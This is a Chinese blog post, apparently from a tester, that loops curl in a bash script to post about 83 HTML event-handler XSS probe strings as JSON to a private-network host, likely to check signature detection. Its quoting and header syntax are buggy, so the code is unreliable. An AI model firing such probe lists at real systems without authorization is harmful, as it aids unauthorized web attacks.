用shell腳本批量進行xss跨站攻擊請求

-Advertisement-

由於執行的xss攻擊請求他多了，初步估計要執行83次，而且還要執行3篇，如果手工一個一個去執行，說出去，我還配叫自動化大師嗎；有鑒於此，邊打算自己編寫一個腳本進行批量執行；而短腳本的編寫，非shell莫屬，想到做到；首先附上xss跨站攻擊的請求報文：看到沒有如果一個一個執行，我的天，這要猴年 ...

由於執行的xss攻擊請求他多了，初步估計要執行83次，而且還要執行3篇，如果手工一個一個去執行，說出去，我還配叫自動化大師嗎；

有鑒於此，邊打算自己編寫一個腳本進行批量執行；

而短腳本的編寫，非shell莫屬，想到做到；

首先附上xss跨站攻擊的請求報文：

POST /web/show.asp?id=1327 HTTP/1.1
Host: 192.168.26.xxx
Connection: close
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Content-Type: application/json
Content-Length: 25
{
    "11111": " onabort ="
}

將onabort換成如下攻擊特征：
onactivate
onafterprint
onbeforeactivate
onbeforeprint
onbeforeunload
onblur
oncancel
oncanplaythrough
oncanplay
onchange
onclick
oncontextmenu
oncopy
oncuechange
oncut
ondblclick
ondragdrop
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrag
ondrop
ondurationchange
onemptied
onended
onerror
onfocus
onformchange
onforminput
onhashchange
oninput
oninvalid
onkeydown
onkeypress
onkeyup
onloadeddata
onloadedmetadata
onloadstart
onload
onmessage
onmousedown
onmouseenter
onmouseleave
onmousemove
onmouseout
onmouseover
onmouseup
onmousewheel
onmove
onoffline
ononline
onpagehide
onpageshow
onpaste
onpause
onplaying
onplay
onpopstate
onprogress
onpropertychange
onratechange
onreadystatechange
onreset
onresize
onscroll
onsearch
onseeked
onseeking
onselect
onshow
onstalled
onstart
onstorage
onsubmit
onsuspend
ontimeupdate
ontoggle
onunload
onvolumechange
onwaiting
onwheel

看到沒有如果一個一個執行，我的天，這要猴年馬月才能搞完！

話不多說，附上shlle腳本代碼：

#!/bin/bash
echo "迴圈開始開始執行"
for j in $(cat rules3.txt)
do

echo " 註意的是，json數據里變數要用 '' 括起"
 # curl complete post json post 請求
 # curl -i -X POST -H "'Content-type':'application/x-www-form-urlencoded', 'charset':'utf-8', 'Accept': 'text/plain'" -d 'json_data={...}' url
 curl -i -X POST -H "'Content-type':'application/json'" -d  $j  http://192.168.26.213/


done
echo "迴圈結束"

其中rules3.txt文件內容為：

‘json_data={"11111":"onactivate"}'/
‘json_data={"11111":"onafterprint="}'/
‘json_data={"11111":"onbeforeactivate ="}'/
‘json_data={"11111":"onbeforeunload="}'/
‘json_data={"11111":"onblur="}'/
‘json_data={"11111":"oncancel="}'/
‘json_data={"11111":"oncanplaythrough="}'/
‘json_data={"11111":"oncanplay="}'/
‘json_data={"11111":"onchange="}'/
‘json_data={"11111":"onclick="}'/
‘json_data={"11111":"oncontextmenu="}'/
‘json_data={"11111":"oncopy="}'/
‘json_data={"11111":"oncuechange="}'/
‘json_data={"11111":"oncut="}'/
‘json_data={"11111":"ondblclick="}'/
‘json_data={"11111":"ondragdrop="}'/
‘json_data={"11111":"ondragend="}'/
‘json_data={"11111":"onondragenter="}'/
‘json_data={"11111":"ondragleave="}'/
‘json_data={"11111":"ondragstart="}'/
‘json_data={"11111":"ondrag="}'/
‘json_data={"11111":"ondrop="}'/
‘json_data={"11111":"ondurationchange="}'/
‘json_data={"11111":"onemptied="}'/
‘json_data={"11111":"onerror="}'/
‘json_data={"11111":"onfocus="}'/
‘json_data={"11111":"onformchange="}'/
‘json_data={"11111":"onforminput="}'/
‘json_data={"11111":"onhashchange="}'/
‘json_data={"11111":"oninput="}'/
‘json_data={"11111":"onkeydown="}'/
‘json_data={"11111":"onkeypress="}'/
‘json_data={"11111":"onkeyup="}'/
‘json_data={"11111":"onloadeddata="}'/
‘json_data={"11111":"onloadedmetadata="}'/
‘json_data={"11111":"onloadstart="}'/
‘json_data={"11111":"onload="}'/
‘json_data={"11111":"onmessage="}'/
‘json_data={"11111":"onmousedown="}'/
‘json_data={"11111":"onmouseenter="}'/
‘json_data={"11111":"onmouseleave="}'/
‘json_data={"11111":"onmousemove="}'/
‘json_data={"11111":"onmouseout="}'/
‘json_data={"11111":"onmouseover="}'/
‘json_data={"11111":"onmousewheel="}'/
‘json_data={"11111":"onmove="}'/
‘json_data={"11111":"onoffline="}'/
‘json_data={"11111":"ononline="}'/
‘json_data={"11111":"onpagehide="}'/
‘json_data={"11111":"onpageshow="}'/
‘json_data={"11111":"onpaste="}'/
‘json_data={"11111":"onpause="}'/
‘json_data={"11111":"onplaying="}'/
‘json_data={"11111":"onplay="}'/
‘json_data={"11111":"onpopstate="}'/
‘json_data={"11111":"onprogress="}'/
‘json_data={"11111":"onpropertychange="}'/
‘json_data={"11111":"onreset="}'/
‘json_data={"11111":"onresize="}'/
‘json_data={"11111":"onscroll="}'/
‘json_data={"11111":"onsearch="}'/
‘json_data={"11111":"onseeked="}'/
‘json_data={"11111":"onseeking="}'/
‘json_data={"11111":"onselect="}'/
‘json_data={"11111":"onshow="}'/
‘json_data={"11111":"onstalled="}'/
‘json_data={"11111":"onstart="}'/
‘json_data={"11111":"onstorage="}'/
‘json_data={"11111":"onsubmit="}'/
‘json_data={"11111":"onsuspend="}'/
‘json_data={"11111":"ontimeupdate="}'/
‘json_data={"11111":"ontoggle="}'/
‘json_data={"11111":"onunload="}'/
‘json_data={"11111":"onvolumechange="}'/
‘json_data={"11111":"onwaiting="}'/
‘json_data={"11111":"onwheel="}'/
‘json_data={"11111":"onbeforeprint"}'/
‘json_data={"11111":"onbeforeactivate ="}'/
‘json_data={"11111":"onended"}'/
‘json_data={"11111":"oninvalid"}'/
‘json_data={"11111":"onmouseup"}'/
‘json_data={"11111":"ondratechange"}'/
‘json_data={"11111":"onreadystatechange"}'/

註意

curl -i -X POST -H "'Content-type:'application/json'" -d " {'xxx':'sss'}" url

結果為：

改成這個格式後：

curl -i -X POST -H "'Content-type':'application/x-www-form-urlencoded', 'charset':'utf-8', 'Accept': 'text/plain'" -d 'json_data={...}' url

想擁有阿裡雲伺服器的可以登陸此網站哦：https://promotion.aliyun.com/ntms/yunparter/invite.html?userCode=qqwovx6h

您的分享是我們最大的動力!

-Advertisement-

更多相關文章

Top 10 頂級項目管理工具

__成功的項目都要歸功於成功的項目管理。這些工具幫你踏上成功之旅！__ 項目管理是成功完成項目並使公司變得偉大的秘訣。不，這不是標題黨(clickbait) —— 我已經看到兩家軟體公司（我在那裡工作）因為項目管理不善而在1 2年內瀕臨破產，其他一些人看到他們的產品發佈推遲了幾個月。雖然我同意，與其 ...
黑馬程式員IDEA版JAVA基礎班\JavaWeb部分視頻\2-10Request和Response\第5節 request登錄案例

用戶登錄案例需求： 1.編寫login.html登錄頁面 username & password 兩個輸入框 2.使用Druid資料庫連接池技術,操作mysql，day14資料庫中user表 3.使用JdbcTemplate技術封裝JDBC 4.登錄成功跳轉到SuccessServlet展示：登錄成 ...
python_0基礎開始_day11

第十一節一，函數名的第一類對象函數名當作值，賦值給變數 print（函數名）查看看書的記憶體地址 print（函數名）查看看書的記憶體地址函數名可以當作容器中的元素函數名可以當作函數的參數函數名可以當作函數的返回值二，f-strings字元串格式化 f"{變數名}" F"{變數名}" f ...
Python33之類和對象（繼承）

一、繼承的概念及使用方法在Python中一個類如果想使用前面一個類所有的方法和屬性就需要使用繼承繼承的定義 def Class_Child(Class_parent) 這樣就可以在子類中使用父類中定義的方法和屬性，但是，如果子類中定義的屬性和方法和父類中定義的重覆了，則將直接使用子類本身定義的方 ...
SpringCloud微服務(06)：Config組件，實現配置統一管理

一、Config簡介在微服務系統中，服務較多，相同的配置：如資料庫信息、緩存、參數等，會出現在不同的服務上，如果一個配置發生變化，需要修改很多的服務配置。spring cloud提供配置中心，來解決這個場景問題。系統中的通用配置存儲在相同的地址：GitHub,Gitee,本地配置服務等，然後配置 ...
os模塊

# os模塊是與操作系統交互的一個介面 import os print(os.getcwd()) # 獲取當前工作目錄，當前python文件的目錄路徑 # os.chdir('02random模塊.py') print(os.curdir)# 返回當前目錄: ('.') print(os.pardi... ...
開始學SpringMVC之Json

本文主要以一個簡單的小例子，簡述SpringMVC開發中，Json的相關應用，僅供學習分享使用，如有不足之處，還請指正。 ...
老弟學會Python後做了個自動掃雷程式給他的小伙伴，天天玩的不亦樂乎~

自動掃雷一般分為兩種，一種是讀取記憶體數據，而另一種是通過分析圖片獲得數據，並通過模擬滑鼠操作，這裡我用的是第二種方式。一、準備工作 1.掃雷游戲我是win10，沒有預設的掃雷，所以去掃雷網下載 http://www.saolei.net/BBS/ 2.python 3 我的版本是 python ...